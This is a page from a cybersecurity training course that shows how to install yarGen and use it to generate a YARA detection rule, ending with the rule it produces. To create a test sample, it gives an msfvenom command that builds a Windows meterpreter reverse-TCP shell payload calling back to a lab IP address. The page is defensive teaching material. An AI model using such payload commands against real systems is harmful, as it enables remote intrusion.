📘
CAS Cybersecurity
  • Start
  • Reconnaissance
    • Opensource Intelligence
  • Docker basics and Images
    • Damn Vulnerable Webapp
    • bWAPP
    • Juice Webshop
    • Webgoat
    • Metasploitable 2
    • Metasploitable 3
    • MISP Docker (old)
    • MISP Docker (new)
  • Scanning and Enumeration
    • Scanning with zenmap
    • Scanning with nmap
    • Scanning with msf auxiliary
  • Vulnerability Scanning and Analysis
    • OpenVAS
    • nmap vulnerability scan
    • MSF Auxiliary Modules
  • Exploitation
    • Metasploitable 2
    • Redis Server
    • Print Nightmare
    • Baron Samedit
    • Polkit
    • Heartbleed
  • Man in the Middle
    • ARP Cache poisoning
    • RDP MitM Exercise
  • Windows Hacking
    • Throwback Network
      • Entering the breach
      • Exploring the caverns
      • Webshells and you!
      • First Contact
    • WinAttack LAB
      • Module 01
      • Module 02
      • Module 03
      • Module 04
      • Module 05
      • Module 06
      • Module 07
      • Module 08
      • Module 09
      • Module 10
  • Web Application Security
    • Burp Proxy Introduction
    • DVWA
      • DVWA Exercises 1
      • DVWA Exercises 2
      • DVWA Exercises 3
      • DVWA Exercises 4
      • DVWA Exercises 5
      • DVWA Exercises 6
      • DVWA Exercises 7
      • DVWA Exercises 8
  • CTF and Crypto Exercises
    • Cyberchef Challenge
    • HTB Invite Challenge
    • BSides London 2019 Challenge
    • Ninja Sec Challenge
  • Threat Intelligence
    • MISP Exercise 1
    • MISP Exercise 2
    • MISP Exercise 3
    • MISP Exercise 4
    • MISP Exercise 5
    • MISP Exercise 6
    • MISP Exercise 7
    • MISP Exercise 8
    • Virus Total Graph Exercise
    • RFI Incoming!
  • Forensic Exercises
    • Disk Forensics
      • The Sleuth Kit Intro
      • Filecarving with Foremost
      • Filecarving with scalpel
      • Bulk extractor
      • Disk acquisition with dd
      • Disk acquisition with dcfldd
      • Disk acquisition with ewftools
      • Disk acquisition with FTK Imager
      • Mount disk image (raw)
      • Unknown USB Stick
      • USB Stick Filecarving
      • Autopsy Exercise
    • Windows Forensics
      • Bitunlocker
      • Alternate Datastreams
    • Memory Forensics
      • Volatility2 Basics (Linux)
      • Volatility2 Exercise 1
      • Volatility3 Exercise 1
      • Volatility3 Exercise 2
      • Volatility3 Exercise 3
    • Image Forensics
      • Unswirl Image
      • Manual Filecarving 1
      • Manual Filecarving 2
    • Browser Forensics
    • Mail Header Analysis
    • Timestomping Exercise
    • Network Forensics
      • Tshark Exercise
  • Malware Analysis
    • Ransomware
      • General Introduction
      • Ryuk
      • RansomEXX
      • REvil
      • BlackMatter
      • Hades
      • Egregor
      • DoppelPaymer
    • YARA
      • YARA Install
      • yarGen
      • YARA with Cyberchef
      • TCP dump analysis
      • Memory dump analysis
    • Dosfuscated Scripts
  • Android Malware
    • LAB Setup 1
    • LAB Setup 2
    • Android Manifest
    • Android Permissions
    • APP Tracing with Frida
    • AES Key decryption
    • RedAlert
    • BlackRoseLucy
    • Crackme RE Challenge
  • Forensic Readiness
    • Windows Event Logs
    • Windows Sysmon
    • Sysmon: Capture Clipboard
    • Sysmon: Process Injection
    • Ransomware Detection
      • Signature based
  • Live Response
    • Velociraptor P1
    • Velociraptor P2
    • Velociraptor P3
    • Windows Response LAB
      • Lateral Movement Detection
      • Detect persistence
      • Volatility Analysis
Powered by GitBook
On this page
  • 1. Introduction
  • 2. Installation
  • 3. Update yargen database
  • 4. Create maliscious binary

Was this helpful?

  1. Malware Analysis
  2. YARA

yarGen

PreviousYARA InstallNextYARA with Cyberchef

Last updated 3 years ago

Was this helpful?

1. Introduction

yarGen is a generator for YARA rules The main principle is the creation of yara rules from strings found in malware files while removing all strings that also appear in goodware files. Therefore yarGen includes a big goodware strings and opcode database as ZIP archives that have to be extracted before the first use.

Goal of this exercise is to install and use yargen to create automated yara rules

2. Installation

Please download yarGen.py using the commands below.

cd /home/hacker git clone https://github.com/Neo23x0/yarGen.git cd /home/hacker/yarGen chmod +x ./yarGen.py

Install dependencies

cd /home/hacker/yarGen pip install -r requirements.txt

3. Update yargen database

cd /home/hacker/yarGen ./yarGen.py --update

4. Create maliscious binary

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.71.164 LPORT=443 -f exe -o malisciousfile.exe

mkdir -p /tmp/malware cp malisciousfile.exe /tmp/malware ./yarGen.py -m /tmp/malware

This will generate a yargen_rules.yar file in the current directory.

Let's test it:

yara -w -r ./yargen_rules.yar /tmp/malware

/*
   YARA Rule Set
   Author: yarGen Rule Generator
   Date: 2022-04-25
   Identifier: malware
   Reference: https://github.com/Neo23x0/yarGen
*/

/* Rule Set ----------------------------------------------------------------- */

rule malisciousfile {
   meta:
      description = "malware - file malisciousfile.exe"
      author = "yarGen Rule Generator"
      reference = "https://github.com/Neo23x0/yarGen"
      date = "2022-04-25"
      hash1 = "51441af91003497318d9a396eeee7863d228ffc683335e05d669cf998cfae507"
   strings:
      $s1 = "C:\\local0\\asf\\release\\build-2.2.14\\support\\Release\\ab.pdb" fullword ascii
      $s2 = " Copyright 1996 Adam Twiss, Zeus Technology Ltd, http://www.zeustech.net/<br>" fullword ascii
      $s3 = "    -T content-type Content-type header for POSTing, eg." fullword ascii
      $s4 = "    -h              Display usage information (this message)" fullword ascii
      $s5 = "    -i              Use HEAD instead of GET" fullword ascii
      $s6 = "    -p postfile     File containing data to POST. Remember also to set -T" fullword ascii
      $s7 = " This is ApacheBench, Version %s <i>&lt;%s&gt;</i><br>" fullword ascii
      $s8 = "    -r              Don't exit on socket receive errors." fullword ascii
      $s9 = " Licensed to The Apache Software Foundation, http://www.apache.org/<br>" fullword ascii
      $s10 = "    -k              Use HTTP KeepAlive feature" fullword ascii
      $s11 = "    -X proxy:port   Proxyserver and port number to use" fullword ascii
      $s12 = "  %d%%  %5I64d" fullword ascii
      $s13 = "    -H attribute    Add Arbitrary header line, eg. 'Accept-Encoding: gzip'" fullword ascii
      $s14 = "    -v verbosity    How much troubleshooting info to print" fullword ascii
      $s15 = "    -z attributes   String to insert as td or th attributes" fullword ascii
      $s16 = "    -b windowsize   Size of TCP send/receive buffer, in bytes" fullword ascii
      $s17 = "    -e filename     Output CSV file with percentages served" fullword ascii
      $s18 = "                    are a colon separated username and password." fullword ascii
      $s19 = "    -x attributes   String to insert as table attributes" fullword ascii
      $s20 = "    -y attributes   String to insert as tr attributes" fullword ascii
   condition:
      uint16(0) == 0x5a4d and filesize < 200KB and
      8 of them
}